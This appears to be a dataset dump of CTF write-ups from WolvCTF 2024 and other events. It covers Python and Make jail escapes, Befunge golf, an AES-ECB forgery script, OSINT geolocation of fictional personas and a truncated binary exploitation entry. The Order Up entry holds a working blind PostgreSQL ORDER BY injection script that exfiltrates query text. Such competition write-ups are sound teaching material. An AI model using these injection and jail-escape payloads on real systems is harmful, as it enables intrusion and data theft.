text_chunk
stringlengths
151
703k
**[Forensics - Urgent](https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-forensics-16f4c9af5c47#f2a4)** https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-forensics-16f4c9af5c47#f2a4
This is a simple jail break challenge that uses python's `eval()` evaulate the command given from the input. We are given the following source code for the jail: ```python#!/usr/local/bin/pythonimport timeflag="pearl{f4k3_fl4g}"blacklist=list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~`![]{},<>/123456789")def banner(): file=open("txt.txt","r").read() print(file)def check_blocklist(string): for i in string: if i in blacklist: return(0) return(1)def main(): banner() cmd=input(">>> ") time.sleep(1) if(check_blocklist(cmd)): try: print(eval(cmd)) except: print("Sorry no valid output to show.") else: print("Your sentence has been increased by 2 years for attempted escape.") main()``` We can see the blacklist is restricting the use of all characters of the format `\w` and `\d` along with a few special characters. The shortest path to the flag would be to have it execute `print(flag)` but this doesn't pass the filter. Lucky for us, Python will normalize fonts so we can pass in the characters in italics and this will bypass the filter. This site can be used to generate italicized text <https://lingojam.com/ItalicTextGenerator> ```bash┌──(kali㉿kali)-[~]└─$ nc dyn.ctf.pearlctf.in 30017ooooooooo. oooooooooooo .o. ooooooooo. ooooo `888 `Y88. `888' `8 .888. `888 `Y88. `888' 888 .d88' 888 .8"888. 888 .d88' 888 888ooo88P' 888oooo8 .8' `888. 888ooo88P' 888 888 888 " .88ooo8888. 888`88b. 888 888 888 o .8' `888. 888 `88b. 888 o o888o o888ooooood8 o88o o8888o o888o o888o o888ooooood8 >>> ?????(????)pearl{it_w4s_t00_e4sy}None``` FLAG: `pearl{it_w4s_t00_e4sy}`
**[Reverse - PackedAway](https://medium.com/@cybersecmaverick/htb-cyber-apocalypse-ctf-2024-reversing-d9eb85c59ca9#1306)** https://medium.com/@cybersecmaverick/htb-cyber-apocalypse-ctf-2024-reversing-d9eb85c59ca9#1306
## Solution: Now what we need to do is to find another social media account of the WOLPHV group. Starting with Facebook, and I found it quite easily: Accessing the group, I noticed that some posts are not very relevant. What caught my attention is a post with a video: https://www.facebook.com/groups/921721029413388/posts/921722342746590/ After watching the entire video and looking up at the browser tabs, I found a Discord invite link, but it's using the wrong domain: ``discord.com/UbeJPeBT`` We need to correct it to https://discord.gg/UbeJPeBT to make it valid. If you're new to Discord, they've also posted a helpful guide in the Facebook group. Access Discord, we will obtain the Flag: ### Flag: ``wctf{r0t_52_w0ulD_b3_cr4zy_fRfr}``
> WOLPHV sent me this file. Not sure what to comment about it We download a jpg file. If we examine the jpg file with Exiftool, we will find the flag in the comment section. ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-46.png) ```wctf{h1dd3n_d4t4_n0T_s0_h1dD3N}```
## Solution: In Discord, we have the following conversation: So, to find p1nesh4dow48's house, we'll need to pinpoint the location of the building in this image: Upon analyzing the contents of the image, I noticed a signboard with the following text:``PINE RIDGE VISITOR PARKING ONLY``Start searching for ``Pine Ridge Apartments`` on Google Maps, and I received a lot of results But we have a valuable clue in the challenge: ``WOLPHV I: Reconnaissance``, which is the leader of this group in Michigan. So I narrowed down the search area to Michigan. Luckily, I skipped over many apartments in the center, I noticed the only apartment located at the top of Michigan named ``Pine-Ridge Apartments`` When I accessed it and browsed with Google Street View andddd BINGO!!! I found the right place. B/c only the last three digits after the comma need to be determined, it's quite easy to get the flag: ### Flag: ``wctf{46.546,-87.388}``
# Main Idea This challenge outputs 2 numbers. N and e(always 65537).Than waits for input(hex string that length is devides to 256).Our goal is to generate payoad that after proceessing by server outputs the hash that is zero hexstring(00 * 256) # Reverse the code 1) Just creates hash object, waits for user input, validates the input ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/4a2ccda1-f185-4467-a9fb-74467ac77503) 3) Generates the hash, than checks if hash is fully zero sends the flag ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/cfa12adc-34d5-490c-be51-ea4ce7770797) ## Lets reverse the hash class and its methods that generates the hash 4) Firstly it devides our input srting to blocks containing 256 bytes ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/d29c2c93-a546-45ce-a532-bc339dbf7fc4) 5) Then simply validates that this block is not even seen here, also converts the bytes to integer, than generates data by modular exponentiation operation pow(data, self.e, self.N), than again converts to bytes and returned to next operation ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/115a97fa-4b3d-4cf5-bb3a-f43728cc674e) 6) Next operation is custom xor function, it just xors current block with current _state(class attribute itially it is 00 * 256). Then xored value return to current _state. And loops over all blocks provided from input. ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/059e4edd-5fa8-4e9a-919e-41e307eae279) ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/431b25d3-6677-48a6-9bdd-7751bd6c0474) # Conclusion of reverse After reversing the code we can now understand that main steps1) Devides our input into blocks by 256 bytes2) Each block calculates modular exponentiation than converts to bytes and xores with previous state and stores it to state # Solution ([script](/IrisCTF/dhash/generate_payload.py)) Knowing that we can generate payload with three blocks, that after xor operations generate zero hash I have written [script](/IrisCTF/dhash/generate_payload.py) that generate three blocks, third block is xored value of first two. And thats it ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/23beff93-b22e-4faf-9fba-87d8344b0b1c) Also one steps, we cannot upload this payload because we know that our payload goes throw modular exponentiation operation, so we can predict that by function ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/10e6eb16-80b4-42e5-ae72-8326ac0cf173) Also in input we need to separate out bytes in hex format ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/4e329568-7668-48dc-bda9-c89b9935793a) An thats it, save payload to file ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/2df70858-2039-4959-958f-d7f9d7d53a7b) Boom! Get the flag ![image](https://github.com/NOZ1000/CTF_Writeups_from_NOZi/assets/56728939/65e5307a-203c-46ae-a08b-332049778fc8)
# Misc: befuddled3solver: [Pr0f3550rZak](https://github.com/Pr0f3550rZak) writeup-writer: [L3d](https://github.com/imL3d) ___**Author:** doubledelete **Description:**> hope you're good at golf **files (copy):** [befunge.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/befuddled3/files/befunge.py), [challenge.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/befuddled3/files/challenge.py) In this challenge we receive a befunge compiler, with the Flag in the top of the stack. We need to write befunge code under some restrictions, and get the flag. ## Solution I won't bother you much... It's the same as [the last one](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/tree/main/befuddled2), but we have less characters to work with. Our solution still applies :0 A wild flag appeared!? `wctf{truly_th3_b3fung3_m4st3r_n0w}`
# Misc: befuddled1solver: [Pr0f3550rZak](https://github.com/Pr0f3550rZak) writeup-writer: [L3d](https://github.com/imL3d) ___**Author:** doubledelete **Description:**> it seems yall enjoyed the befunge challenges, here's more > i've been doing a little too much code golf recently... **files (copy):** [befunge.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/befuddled1/files/befunge.py), [challenge.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/befuddled1/files/challenge.py) In this challenge we receive a befunge compiler, with the Flag in the top of the stack. We need to write befunge code under some restrictions, and get the flag. ## Solution Before starting to tackle this challenge, we need to know firstly what is Befunge. Befunge is a two-dimensional esoteric programming language invented in 1993 by Chris Pressey with the goal of being as difficult to compile as possible. The code is laid out on a two-dimensional grid of instructions, and execution can proceed in any direction of that grid - we can see this being implemented in the source file.[[1](https://esolangs.org/wiki/Befunge)] In this challenge we are asked to input the Befunge code to be compile, with a limit for 16 characters. After a quick glace of the syntax, we find how to create a loop, and pop the stack. This is the result: `>,<` `>` - means increment program counter. `,` - means pop the stack. `<` - decrement program counter. And we get the flag: `wctf{my_s0lv3_l00k5_l1k3_4_cut3_f4c3_>,<}`. To the [next one](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/tree/main/befuddled2) ➡️
# Web: Order Up 1 This is a web challenge I created for the WolvSec club CTF event hosted March 2024. ## Description I hope my under construction web site is secure. Solving this will unlock a series of related challenges that ALL use the same challenge instance. To find the first flag, find a way to view the text of the SQL query. If you find some other flag, it will be related to one of the others in this series. **Note:** Automated tools like sqlmap and dirbuster are not allowed (and will not be helpful anyway). This challenge can have at most one instance **per team**. There is a button that spins up an instance that runs for 60 mins. You can click it anytime to reset or restart the challenge instance. # Based on Real Vuln This challenge is based on a real-world vulnerability I found/reported as part of a responsible disclosure program. It is as close to the real thing as I could make it. # Overview When you open the challenge page, you see an HTML table listing a bunch of items like from a menu. If you use a tool like Burp Suite, you will see this request is made to get the menu items in JSON format: ![image-20240317171519203](./assets/image-20240317171519203.png) Notice the word "query" in the context path. Maybe this does a database query of some kind. # Initial Tampering If you send this to Burp Repeater and then start tampering with the col1-4 parameters, you'll get this if you tamper with all 4 of them: ```Invalid column names provided``` However, if we tamper with the `order` parameter such as this (added single quote to the end):```GET /query?col1=category&col2=item_name&col3=description&col4=price&order=category,item_name'``` we get a response like:```500 Internal Server Error``` This is pretty good evidence that there is some type of injection possible in the `order` parameter. When doing query research, I like to use: https://www.db-fiddle.com/ If I click **Load Example** on this page and enter a baby query with an ORDER BY clause and run it I get this:![image-20240317172157982](./assets/image-20240317172157982.png) If you are new to SQL, there are lots of online resources that can help you learn. My current working assumption is that we can put anything we want as the value of the **ORDER BY** clause. With a bit of googling, here are some possible resources to help: https://portswigger.net/support/sql-injection-in-the-query-structure https://pulsesecurity.co.nz/articles/postgres-sqli There are LOTS of ways an attacker might go at this point. I'm just going to review how I iniitally approached it. To start with, lets put this URL in our browser: https://dyn-svc-order-up-ps28rtskmrv67quba0hu-okntin33tq-ul.a.run.app/query?col1=category&col2=item_name&col3=description&col4=price&order=category,item_name This returns JSON ordered by category first, then item_name as espected. Our first real injection is here: ```https://dyn-svc-order-up-ps28rtskmrv67quba0hu-okntin33tq-ul.a.run.app/query?col1=category&col2=item_name&col3=description&col4=price&order=case%20when%20(1=1)%20then%20category%20else%20item_name%20end``` This says, if **1=1** then order by **category**, otherwise by **item_name**. The returned JSON is orderd by **category**. If we change to this:```https://dyn-svc-order-up-ps28rtskmrv67quba0hu-okntin33tq-ul.a.run.app/query?col1=category&col2=item_name&col3=description&col4=price&order=case%20when%20(1=2)%20then%20category%20else%20item_name%20end``` since **1=2** is FALSE, the returned JSON is ordered by **item_name**. Cool! # DB Fingerprinting At this point, I decided to use the trick we just learned to figure out what DB is being used here. There are lots of resource online for this. Here's one: https://www.sqlinjection.net/database-fingerprinting/ The following uses `sqlite_version() = ''` as the BOOLEAN expression:```https://dyn-svc-order-up-ps28rtskmrv67quba0hu-okntin33tq-ul.a.run.app/query?col1=category&col2=item_name&col3=description&col4=price&order=case%20when%20(sqlite_version() = '')%20then%20category%20else%20item_name%20end``` This returns a 500. This tells us this is not SQLITE. **Note**: I always FIRST try something in DB fiddle using two different DBs to confirm the behavior before trying it against the challenge. Try the same for `version() = '' ```https://dyn-svc-order-up-ps28rtskmrv67quba0hu-okntin33tq-ul.a.run.app/query?col1=category&col2=item_name&col3=description&col4=price&order=case%20when%20(version()=%27%27)%20then%20category%20else%20item_name%20end``` This does NOT crash. However, several DB have a version() function. More or less randomly looking online at the various functions that each DB offers, I came across the **system_user()** function in **MySQL**. I tried it on the db fiddle page first to make sure I had the case/usage correct. Then I tried it here:```https://dyn-svc-order-up-ps28rtskmrv67quba0hu-okntin33tq-ul.a.run.app/query?col1=category&col2=item_name&col3=description&col4=price&order=case%20when%20(system_user()=%27%27)%20then%20category%20else%20item_name%20end``` and got 500. That tells me it is not **MySQL**. In looking at **Postgres** functions I randomly found **pg_current_logfile()** When I try it here: ```https://dyn-svc-order-up-ps28rtskmrv67quba0hu-okntin33tq-ul.a.run.app/query?col1=category&col2=item_name&col3=description&col4=price&order=case%20when%20(pg_current_logfile()=%27%27)%20then%20category%20else%20item_name%20end``` It does not crash! That tells me it is for sure **Postgres**. **Note**: The above process will be different for everyone and there is no perfect recipe for such DB fingerprinting. # Exfiltration Now that we know it is Posgres, we need a way to extract data. We know we can put a boolean expression in our **case** statement and detect true/false based on the order of the returned JSON. After some experimentation, I learned there is a better way. We can determine true/false based on a conditional error. ```https://dyn-svc-order-up-ps28rtskmrv67quba0hu-okntin33tq-ul.a.run.app/query?col1=category&col2=item_name&col3=description&col4=price&order=case%20when%20(1=1)%20then%20%27category%27%20else%20substr(%27a%27,1,-1)%20end``` This says, when 1=1, order by 'category', else order by subset('a',1,-1) **Note**: category is in quotes now where it wasn't before. I learned this by first playing in db fiddle. Both true/false values have to be the same type. If I give 1=2 ```https://dyn-svc-order-up-ps28rtskmrv67quba0hu-okntin33tq-ul.a.run.app/query?col1=category&col2=item_name&col3=description&col4=price&order=case%20when%20(1=2)%20then%20%27category%27%20else%20substr(%27a%27,1,-1)%20end``` Then it crashes because -1 is not a legal parameter to substr(). There are LOTs of other ways to achieve conditional errors. In fact, after much playing around, here is one I like better. Use this as the **else** and it will crash on **false**. ```''||query_to_xml('bad-query',true,true,'')``` The `''||` prefix coereces the xml to be a string. (again playing ahead of time in db fiddle helps) Let's try to exfiltrate some information now. I want to learn what version of Postgres is at play. This query:```https://dyn-svc-order-up-ps28rtskmrv67quba0hu-okntin33tq-ul.a.run.app/query?col1=category&col2=item_name&col3=description&col4=price&order=case%20when%20(substr(version(),%201,%201)%3E=%27P%27)%20then%20%27category%27%20else%20%27%27||query_to_xml(%27bad-query%27,true,true,%27%27)%20end``` Has a **case** exprfession of `(substr(version(), 1, 1)>='P')` This returns JSON. If we change it to: `(substr(version(), 1, 1)>='Q')` it crashes. This proves the first character of the `version()` function is 'P'! If I wanted, I could manualy find each character but that is way too time consuming. # Finding the Flag Now that we have a way to exfiltrate, let's write some python. After reviewing a bunch of Postgres functions, the one that returns the current query is: `current_query()` So let's exfiltrate this. Here is my solve script. Note that it deviates a little from the above research due to multiple refinements. Of note: it uses the `ascii()` function to avoid having to worry about avoiding special characters like single quote in the comparison. ```import osimport requests URL = os.getenv('CHAL_URL') or 'https://dyn-svc-order-up-xzt52u0rhv6nh4eo2w0q-okntin33tq-uc.a.run.app/'URL = URL + '/query' def tryUrl(expression): order = f"CASE WHEN ({expression}) THEN item_name ELSE ''||query_to_xml('bad-query',true,true,'') END" params = {'col1': 'item_name', 'order': order} response = requests.get(URL, params=params, timeout=20) # print(response.status_code, response.text) return 'Error' not in response.text def probeValueAtOffset(value, charOffset): lowGuessIndex = 1 highGuessIndex = 126 while lowGuessIndex < highGuessIndex: guessIndex = lowGuessIndex + (highGuessIndex - lowGuessIndex) // 2; expression = f"ascii(substring({value}, {charOffset}, 1)) >= {guessIndex}" # print(expression) if tryUrl(expression): if lowGuessIndex == guessIndex: return chr(guessIndex) lowGuessIndex = guessIndex else: highGuessIndex = guessIndex return False def runQuery(): value = """""" expression = """current_query()""" # expression = """version()""" offset = len(value) while True: offset += 1 nextChar = probeValueAtOffset(expression, offset) if not nextChar: return value value += nextChar print(value) if 'wctf{' in value and '}' in value: print('SOLVED: ORDER_UP flag 1!') break return value value = runQuery() print('-------------------------------------')if 'wctf{' not in value: print('FAILED to find flag 1') ``` This prints a new line for each found char. It ends with:```SELECT item_name from /*wctf{0rd3r_by_1nj3ct10n_1s_fun_09376523465}```
# Misc: made-sensesolver: [L3d](https://github.com/imL3d) writeup-writer: [L3d](https://github.com/imL3d) ___**Author:** doubledelete **Description:**> i couldn't log in to my server so my friend kindly spun up a server to let me test makefiles. at least, they thought i couldn't log in :P **files (copy):** [app.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/made-sense/files/app.py) In this challenge we receive a site (and it's code), that allows us to write and execute a GNU Make recipe, with some restrictions. We need to bypass those restrictions and get the flag. Essentially, a Make jail. ## Solution *This Challenge is the first challenge out of a series of 4 challenges.* ### Preview Before starting this challenge, lets examine the source code given. The web application we got receives the Make files `target`, and it's `content`. It checks each part against some regex pattern, and if it passes it builds and execute the following Makefile:```makeSHELL := /bin/bash.PHONY: TARGET TARGET: flag.txt CONTENT``` Lets break this Makefile down: `.PHONY: TARGET` - this part make sure each time the `make` command is being run, the recipe is executed. You can read more about in the [official documentation](https://www.gnu.org/software/make/manual/html_node/Phony-Targets.html) (its really good). `TARGET: flag.txt` - this defines a [recipe](https://www.gnu.org/software/make/manual/html_node/Recipes.html) - the target name is the input given by the user, and the dependecy is `flag.txt` - the flag! `CONTENT` - this is the recipe's content given by the user, that is then being run by in the shell. What shell? the shell defined in the first line of this Makefile, in this case `bash`. Then, it runs the makefile it created and shows us both `STDOUT` and `STDERR`. This makefile layout is the same, for all the following challenges. ### SolutionOn first glance, this challenge seems very easy (and it is, as it is the first one out of four). But, upon trying to send `cat flag.txt` (to get the flag) as the content we just get `no` in response. This is becasue the content is being checked to not contain the string `"flag"`:```pythonif re.search(r'flag', code): return 'no'``` We can easily bypass this with a simple string concatination: `cat "fla""g.txt"`. Bingo! we get the flag: `wctf{m4k1ng_vuln3r4b1l1t135}` To the [next one](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/tree/main/made-functional)! ;)
# Misc: made-with-lovesolver: [L3d](https://github.com/imL3d) writeup-writer: [L3d](https://github.com/imL3d) ___**Author:** doubledelete **Description:**> the final makejail **files (copy):** [app.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/made-with-love/files/app.py) In this challenge we receive a site (and it's code), that allows us to write and execute a GNU Make recipe, with some restrictions. We need to bypass those restrictions and get the flag. Essentially, a Make jail. ## Solution *This Challenge is the fourth challenge out of a series of 4 challenges.* This challenge is a combination of the second and third challanges in this series: 1. The shell we receive is `bash` the environment variable `$PATH` being empty. This means we don't have access to any binaries that reside in the serach directories specified by this evironemnt variables. Or, in short, no `cat` ?.2. The restrictions on the content are different, we are only allowed to use the special characters: `!@#$%^&*()[]{}<> ` This makes it really easy... just to combine the solution we gave in both those challenges: target name: `source` content: `$@ $<` ... We get the flag: `wctf{m4d3_w1th_l0v3_by_d0ubl3d3l3t3}` ## Afterthought These challenges gave a unique spin on the regular bash jail challenges. They showcased the world of `make`, that aren't usually seen in this field (other than, of course, in the context of compiling your program). Further more, they used variadic parts of the Make lagnauge, which is a very powerful tool, and allowed the participants to learn them in a unique and memorable way. And, on a personal note, I liked those challenges since they allowed for my obsolet knowlege of `make` to be useful for once. I hope we see more of these challenges in the future (even though they are on the easier side ;) ) Happy coding, and thanks for reading!
# Misc: made-functionalsolver: [L3d](https://github.com/imL3d) writeup-writer: [L3d](https://github.com/imL3d) ___**Author:** doubledelete **Description:**> the second makejail **files (copy):** [app.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/made-functional/files/app.py) In this challenge we receive a site (and it's code), that allows us to write and execute a GNU Make recipe, with some restrictions. We need to bypass those restrictions and get the flag. Essentially, a Make jail. ## Solution *This Challenge is the second challenge out of a series of 4 challenges.* This challenge seems very similar to the previous one. It has few minor changes: 1. The shell we receive is `bash` the environment variable `$PATH` being empty. This means we don't have access to any binaries that reside in the serach directories specified by this evironemnt variables. Or, in short, no `cat` ?.2. The restrictions on the content are different, we are not allowed to use the escapte character, `\`. This challenge is more of a `bash` jail than a `make` one - we need to figure out how to echo the content of a file only with the [bash builtins](https://www.gnu.org/software/bash/manual/html_node/Bash-Builtins.html). After looking at all the builtin commands we find the one that can help us in this case: `source`. Source will try to run the files content and parse it as shell commands - when it will fail it will print the error of the command he didn't find... which is our flag. Payload: `source flag.txt` Stderr output: `b'flag.txt: line 1: wctf{m4k1ng_f1l3s}: No such file or directory\nmake: *** [Makefile:5: all] Error 127\n' ` To the [next one](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/tree/main/made-harder)! ;)
# KnightCTF 2024 Write-up ![image](https://ctftime.org/media/cache/7b/d5/7bd59748c9ed3a1b74eb82f4bcd85581.png) ## WEB ### Web - Levi Ackerman Given web-site ![image](https://github.com/zer00d4y/writeups/assets/128820441/069e238c-33c7-43ec-ba7d-f14b2edb0e98) Chech standart directory, like `robots.txt` ![image](https://github.com/zer00d4y/writeups/assets/128820441/99a9ed5b-da73-429c-bad2-133638d29e66) Just visit `l3v1_4ck3rm4n.html` ![image](https://github.com/zer00d4y/writeups/assets/128820441/63f71d19-b205-4782-8df5-dbc2382b0f5d) FLAG: KCTF{1m_d01n6_17_b3c4u53_1_h4v3_70} ### Web - Kitty ![image](https://github.com/zer00d4y/writeups/assets/128820441/2b7da697-db84-464c-b612-2faa21452dec) Check the source code and see the credentials for login page `username:password` <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Login Page</title> <link rel="stylesheet" href="/static/style.css"> </head> <body> <div class="container"> <h2>Login</h2> <form id="login-form" action="/login" method="POST"> <label for="username">Username</label> <input type="text" id="username" name="username" required> <label for="password">Password</label> <input type="password" id="password" name="password" required> <button type="submit">Login</button> </form> </div> <script src="/static/script.js"></script> </body> </html> `script.js` document.getElementById('login-form').addEventListener('submit', function(event) { event.preventDefault(); const username = document.getElementById('username').value; const password = document.getElementById('password').value; const data = { "username": username, "password": password }; fetch('/login', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(data) }) .then(response => response.json()) .then(data => { // You can handle the response here as needed if (data.message === "Login successful!") { window.location.href = '/dashboard'; // Redirect to the dashboard } else { // Display an error message for invalid login const errorMessage = document.createElement('p'); errorMessage.textContent = "Invalid username or password"; document.getElementById('login-form').appendChild(errorMessage); // Remove the error message after 4 seconds setTimeout(() => { errorMessage.remove(); }, 4000); } }) .catch(error => { console.error('Error:', error); }); }); ![image](https://github.com/zer00d4y/writeups/assets/128820441/df81345b-5cc5-4574-8b0b-b608cae1747c) Now, this is dashboard page, just use `cat flag.txt` ![image](https://github.com/zer00d4y/writeups/assets/128820441/10fa519e-f213-407d-aad5-3e020bc854cb) FLAG: KCTF{Fram3S_n3vE9_L1e_4_toGEtH3R}
# Crypto: tag-series-1solver: [N04M1st3r](https://github.com/N04M1st3r) writeup-writer: [L3d](https://github.com/imL3d) ___**Author:** retu2libc **Description:**> Don't worry, the interns wrote this one. **files (copy):** [chal.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/tag-series-1/files/chal.py) ## Solution ### Preview In this challenge we need to input a plaintext string and a guess to the last block of it's AES (ECB) encryption 3 times in a row - if one of those guesses match we get the flag: For each 3 attempts a new random key is generated (16 bytes). We need to submit an input that has to follow these requirements: - Be unique from the other previous tries- Be aligned blocks of 16 bytes If we can match the ouput of the last block of the AES encryption, and our plaintext-input has started with the string: `"GET FILE: flag.txt"` we get the flag. Otherwise, **the last block of the AES encryption is being shown to us.** So, we basically need to find the output of a random AES encryption on our input.. How is that possible?! Especially when each input needs to be unique. We can't manipulate the output of a RANDOM encryption.. can we? Before we will showcase the solution, a basic understanding of how the `AES ECB` mode works is needed (the mode that is being used in this case), so we can properly try and exploit this algorithm and it's usecase. ### AES (ECB) mode The Advanced Encryption Standard (AES) is a symmetric encryption algorithm that was established by NIST in 2001. It has five standard modes of operation, but here we give an overview of the simplest mode, ECB. While using ECB mode, the message is divided into blocks, and each block is encrypted separately with the given key, as shown in the image below: ![ECB Encryption](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/tag-series-1/_images/ecb.png?raw=true) For our purposes in the tag-series challenges, we don't really need to know much about the [Block Cipher algorithm](https://en.wikipedia.org/wiki/Block_cipher), apart from it being a *deterministic algorithm*, meaning that if we give it the same key and the same input, it will always give us the same output. ECB is the least recommended encryption mode, as it's main disadvantage is the lack of *cryptographic diffusion* - it can fail to hide data patterns between the text and the ciphertext. ### The exploit Our goal is to find a way to find out what the last part of the block encryption will be for a certain payload, that is different from the ones that came before. This is only possible if we have sent some other payload beforehand, that has resulted in the same output that this payload will return - since we can't perdict the output of the Block Cipher Encryption itself. Putting it shortly: **We need to give two different payloads, that will result in the same last block of ciphertext.** This task is fairly easy, as none of the previous blocks in the AES (ECB) mode encryption, nor the amount of the previous blocks really affect the output of the blocks that come after it. This implies that as long as we keep the last block the unchanged, the result will be the same! Armed with this knowledge, we create the following script: ```pythonfrom pwn import * HOST, PORT = 'tagseries1.wolvctf.io', 1337 FIRST_BLOCK = b'GET FILE: flag.t'LAST_BLOCK = b'xt' + b'give_me_flag:)' conn = connect(HOST, PORT) conn.recvuntil(b'== proof-of-work: disabled ==') conn.sendline(LAST_BLOCK)conn.sendline(b'Irrelevant') conn.readline()result = conn.readline() conn.sendline(FIRST_BLOCK + LAST_BLOCK)conn.sendline(result) flag = conn.recv()print(flag) conn.close()``` This first gets the ciphertext output of the last block of our payload, then it adds another block before it, and receives the same result! Note, that the first block and the second block togther both create the requested string that should be at the start of the plaintext: `b'GET FILE: flag.t' + b'xt...'` We get the flag?: `wctf{C0nGr4ts_0n_g3tt1ng_p4st_A3S}` To the [next one](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/tree/main/tag-series-2) ➡️
## Solution: Searching for this guy's name, I found his Tinder account: https://tinder.com/@luvh4ck573 Inside his photo, there's another hidden message: ``nathan-rizz-blog67945`` Looking at it I knew it was a username, but I didn't know which social media platform it belonged to. I felt very stuck, but then I tried a different approach to searching, and I found something interesting on YouTube:https://www.youtube.com/results?search_query=nathaniel+rizz+blog Reviewing this YouTube channel, there's only one video and no other useful information. Here is the link to the video: https://www.youtube.com/watch?v=ZEJdSXbglZs Checking the archive page, there's an archive from March 14, 2024, but unfortunately, I couldn't access it :sob: By a sudden thought, I searched the title of this video on Google hoping to find the account with the username ``nathan-rizz-blog67945``, and I also accidentally found an email address from the archive of the video on YouTube: Besides that, you can use Google Web Cache to view it using this link: https://webcache.googleusercontent.com/search?q=cache:https://www.youtube.com/watch?v=ZEJdSXbglZs Even though it will lead you to the current YouTube page, you can still view the page's source to get the email: I used https://tools.epieos.com/(Ghunt) to got this guy's real name behind email address:I found this guy's Instagram account (same pfp as Google):https://www.instagram.com/nathaniel_sterling2/ So now we have two clues: one on Discord and one on InstagramSearching for "Subway" in Collingwood, Ontario, I found only 2 stores, and I found the one near "McDonald's": There is still one missing: ``nathan-rizz-blog67945``Cuz I didn't have it so I guessed the result and accidentally found the right place is: ``King George Apartments`` ### Flag: ``wctf{44.499,-80.228}``
# Misc: befuddled2solver: [Pr0f3550rZak](https://github.com/Pr0f3550rZak) writeup-writer: [L3d](https://github.com/imL3d) ___**Author:** doubledelete **Description:**> ok, that one mighta been a little too easy >.< **files (copy):** [befunge.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/befuddled2/files/befunge.py), [challenge.py](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/blob/main/befuddled2/files/challenge.py) In this challenge we receive a befunge compiler, with the Flag in the top of the stack. We need to write befunge code under some restrictions, and get the flag. ## Solution Before starting to tackle this challenge, we need to know firstly what is Befunge. Befunge is a two-dimensional esoteric programming language invented in 1993 by Chris Pressey with the goal of being as difficult to compile as possible. The code is laid out on a two-dimensional grid of instructions, and execution can proceed in any direction of that grid - we can see this being implemented in the source file.[[1](https://esolangs.org/wiki/Befunge)] This channel has the same source, with minor restriction changes:1. We still have 16 character limit. 2. We can't use characters that manipulate the program counter directly. This means our old solution is now invalid. Instead we can craft the following program: ` 0_0..1_` This program iterates and prints the ascii values of the flag. Lets break it down: `0` - pushes 0 to the stack. `1` - pushes 1 to the stack. `_` - pops a value and changes the way the program will continue to move: set direction to right if value=0, set to left otherwise. `.` - Pop top of stack and output as integer. The program flow will move back and fourth, while printing 2 character of the flag each time (and occasionally 0). I will leave the actuall execution flow of the program as an exercise to the reader (hehe!), since it's fairly simple, and it's late already here. Anyhow, we get the flag?! `wctf{4_0n3_l1n3_turn_0f_3v3nt5}` To the [next one](https://github.com/C0d3-Bre4k3rs/WolvCTF2024-Writeups/tree/main/befuddled3) ➡️
# WolvCTF 2024 Writeup (Team: L3ak, 4th Place)Competition URL: https://wolvctf.io/ ## Game, CET, Matchin this challenge we are giving the following binary [chal](https://raw.githubusercontent.com/S4muii/ctf_writeups/main/wolvctf24/game_cet/chal) . No Dockerfile , no libc, no nothing. so first of all let's try checksec ```sh[*] '/home/kali/ctfs/wolvctf/game_cet/chal' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled``` well . we got full mitigations enabled . but who knows what's inside . let's poke inside now and see what it does. ```cint main(void){ ulong option; long in_FS_OFFSET; char *arg; undefined8 input_len; char buf [264]; long canary; canary = *(long *)(in_FS_OFFSET + 0x28); arg = ""; setbuf(stdout,(char *)0x0); setbuf(stderr,(char *)0x0); while( true ) { puts("Select an option:"); puts("1. Serve"); puts("2. Lob"); puts("3. Taunt"); puts("4. Hear taunt"); printf("> "); input_len = read(1,buf,0xff); if (input_len == 0) break; buf[input_len + -1] = '\0'; option = strtol(buf,&arg,10); arg = arg + 1; printf("You selected %d\n",(int)option); if ((int)option == 0) { puts("Invalid selection!"); } else { (*(code *)ptrs[(int)option + -1])(arg); } } fwrite("Error reading input\n",1,0x14,stderr); ...}``` This is our main function . you can observe that we have 4 options and based on each one of those we get to choose a function to call from the vtable(ptrs) . one observation you might get is that there's no check on the return of `strtol` . whatever you give it it's gonna go and execute anything relative to the binary base including our beloved `GOT` . and here comes the other observation is that `strtol` will return a signed long . all subsequent operations on the `option` will also work with a signed number . with that we can go forward or backwards . this thing keeps getting better and better . now let's look at that vtable. ```c0x555555558020 <ptrs>: 0x0000555555555249 